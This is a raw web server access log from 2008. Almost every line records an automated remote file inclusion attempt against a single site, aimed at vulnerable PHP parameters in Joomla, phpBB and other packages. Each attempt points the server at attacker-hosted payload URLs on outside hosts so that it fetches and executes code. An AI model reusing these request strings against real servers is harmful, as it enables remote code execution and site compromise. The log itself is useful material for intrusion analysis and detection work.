64.22.89.194 - - [07/Aug/2008:09:52:21 -0700] "GET /logs/access_080312.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:09:52:21 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:09:52:21 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.19.154 - - [07/Aug/2008:09:52:52 -0700] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
74.52.19.154 - - [07/Aug/2008:09:53:01 -0700] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:09:53:09 -0700] "GET /logs/access_080126.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.160.96.54 - - [07/Aug/2008:09:53:10 -0700] "GET /logs/access_080528.log/view.php?sub=http://www.freeimagehosting.net/uploads/02e684a7d5.jpg?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.160.96.54 - - [07/Aug/2008:09:53:11 -0700] "GET /logs/access_080528.log/view.php?sub=http://www.freeimagehosting.net/uploads/80cdf06d77.jpg?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:53:30 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.96.54 - - [07/Aug/2008:09:53:31 -0700] "GET /logs/access_080528.log/view.php?sub=http://www.freeimagehosting.net/uploads/02e684a7d5.jpg?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.160.96.54 - - [07/Aug/2008:09:53:32 -0700] "GET /view.php?sub=http://www.freeimagehosting.net/uploads/02e684a7d5.jpg?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.160.96.54 - - [07/Aug/2008:09:53:32 -0700] "GET /logs/access_080331.log/view.php?sub=http://www.freeimagehosting.net/uploads/02e684a7d5.jpg?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.160.96.54 - - [07/Aug/2008:09:53:32 -0700] "GET /logs/view.php?sub=http://www.freeimagehosting.net/uploads/02e684a7d5.jpg?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.160.96.54 - - [07/Aug/2008:09:53:32 -0700] "GET /logs/access_080528.log/view.php?sub=http://www.freeimagehosting.net/uploads/80cdf06d77.jpg?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.160.96.54 - - [07/Aug/2008:09:53:32 -0700] "GET /view.php?sub=http://www.freeimagehosting.net/uploads/80cdf06d77.jpg?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.160.96.54 - - [07/Aug/2008:09:53:32 -0700] "GET /logs/access_080331.log/view.php?sub=http://www.freeimagehosting.net/uploads/80cdf06d77.jpg?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.160.96.54 - - [07/Aug/2008:09:53:32 -0700] "GET /logs/view.php?sub=http://www.freeimagehosting.net/uploads/80cdf06d77.jpg?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:53:36 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:53:49 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:53:55 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:54:06 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:54:11 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:54:17 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:54:22 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:54:22 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.165.49.171 - - [07/Aug/2008:09:54:23 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/un.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:54:26 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:54:27 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:54:27 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:54:32 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:54:32 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:54:33 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:54:34 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:54:34 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:54:37 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:54:37 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:54:39 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:54:40 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:54:43 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:54:52 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:09:54:53 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:54:57 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:55:00 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:55:06 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.10.17.70 - - [07/Aug/2008:09:55:08 -0700] "GET /logs/access_080127.log//bemarket/postscript/postscript.php?p_mode=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.10.17.70 - - [07/Aug/2008:09:55:09 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.10.17.70 - - [07/Aug/2008:09:55:09 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:09:55:09 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:55:14 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:55:20 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.10.17.70 - - [07/Aug/2008:09:55:23 -0700] "GET /logs/access_080127.log//bemarket/postscript/postscript.php?p_mode=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.10.17.70 - - [07/Aug/2008:09:55:24 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.10.17.70 - - [07/Aug/2008:09:55:24 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.10.17.70 - - [07/Aug/2008:09:55:29 -0700] "GET /logs/access_080404.log//bemarket/postscript/postscript.php?p_mode=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:55:45 -0700] "GET /logs/access_080312.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:55:45 -0700] "GET /logs/access_080312.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:55:45 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:55:46 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:55:46 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:55:47 -0700] "GET /logs/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
194.165.49.171 - - [07/Aug/2008:09:56:15 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/un.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.165.49.171 - - [07/Aug/2008:09:56:15 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/un.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.165.49.171 - - [07/Aug/2008:09:56:16 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/un.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.226.77.5 - - [07/Aug/2008:09:56:26 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [07/Aug/2008:09:56:27 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [07/Aug/2008:09:56:27 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
194.165.49.171 - - [07/Aug/2008:09:56:32 -0700] "GET /logs/access_080329.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/un.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [07/Aug/2008:09:56:34 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [07/Aug/2008:09:56:34 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [07/Aug/2008:09:56:34 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.10.17.70 - - [07/Aug/2008:09:56:52 -0700] "GET /logs/access_080404.log//bemarket/postscript/postscript.php?p_mode=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.193.201.57 - - [07/Aug/2008:09:56:55 -0700] "GET ///?mosConfig_absolute_path=http://www.geocities.com/wedangrondo/find.txt? HTTP/1.1" 200 18435 "-" "libwww-perl/5.75" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:57:04 -0700] "GET /logs/access_071122.log//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:57:04 -0700] "GET /logs/access_080201.log//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:57:25 -0700] "GET /logs/access_071222.log//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
87.226.77.5 - - [07/Aug/2008:09:57:34 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:09:57:46 -0700] "GET /logs/access_071228.log%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
84.22.143.171 - - [07/Aug/2008:09:57:58 -0700] "GET /logs/inc/header.php/step_one.php?server_inc=http://adecova.com/descargas/babih.pdf1/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
84.22.143.171 - - [07/Aug/2008:09:57:59 -0700] "GET /inc/header.php/step_one.php?server_inc=http://adecova.com/descargas/babih.pdf1/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
64.38.20.210 - - [07/Aug/2008:09:58:01 -0700] "GET /client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://vobucks.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
64.38.20.210 - - [07/Aug/2008:09:58:01 -0700] "GET /logs/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://vobucks.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
87.226.77.5 - - [07/Aug/2008:09:58:29 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.42.218.66 - - [07/Aug/2008:09:58:40 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.42.218.66 - - [07/Aug/2008:09:58:40 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.42.218.66 - - [07/Aug/2008:09:58:40 -0700] "GET //include/admin.lib.inc.php?site_path=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.39.5.203 - - [07/Aug/2008:09:59:14 -0700] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.geocities.com/anangkuclux/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.19.154 - - [07/Aug/2008:09:59:15 -0700] "GET /logs//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
74.52.19.154 - - [07/Aug/2008:09:59:15 -0700] "GET //component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:10:00:52 -0700] "GET /logs/access_080105.log//SQuery/lib/gore.php?libpath=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:10:00:58 -0700] "GET //SQuery/lib/gore.php?libpath=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:10:00:59 -0700] "GET /logs//SQuery/lib/gore.php?libpath=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:10:01:03 -0700] "GET ///?mosConfig_absolute_path=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 200 18489 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.96.89 - - [07/Aug/2008:10:01:58 -0700] "GET /logs/lib/gore.php?libpath=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.227.96.89 - - [07/Aug/2008:10:01:59 -0700] "GET /logs/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.227.96.89 - - [07/Aug/2008:10:01:59 -0700] "GET /lib/gore.php?libpath=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.227.96.89 - - [07/Aug/2008:10:01:59 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:10:04:18 -0700] "GET //SQuery/lib/gore.php?libpath=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.96.89 - - [07/Aug/2008:10:05:01 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.227.96.89 - - [07/Aug/2008:10:05:01 -0700] "GET /logs/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.227.96.89 - - [07/Aug/2008:10:05:03 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 200 18471 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.227.96.89 - - [07/Aug/2008:10:05:04 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:10:05:11 -0700] "GET /logs/modules/projects/vw_files.php?dPconfig[root_dir]=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:10:05:12 -0700] "GET /modules/projects/vw_files.php?dPconfig[root_dir]=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:10:05:34 -0700] "GET ///squirrelcart/cart_content.php?cart_isp_root=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.32.72.186 - - [07/Aug/2008:10:05:37 -0700] "GET /logs/access_080222.log//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.32.72.186 - - [07/Aug/2008:10:05:37 -0700] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.32.72.186 - - [07/Aug/2008:10:05:37 -0700] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.32.72.186 - - [07/Aug/2008:10:05:41 -0700] "GET /logs/access_080215.log//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.193.201.57 - - [07/Aug/2008:10:06:51 -0700] "GET /logs/access_071228.log///?mosConfig_absolute_path=http://www.geocities.com/wedangrondo/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
216.193.201.57 - - [07/Aug/2008:10:06:52 -0700] "GET /logs///?mosConfig_absolute_path=http://www.geocities.com/wedangrondo/find.txt? HTTP/1.1" 200 59574 "-" "libwww-perl/5.75" "www.dmulk.com"
216.193.201.57 - - [07/Aug/2008:10:07:40 -0700] "GET /logs/access_080214.log///?mosConfig_absolute_path=http://www.geocities.com/wedangrondo/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:10:08:05 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:10:08:05 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
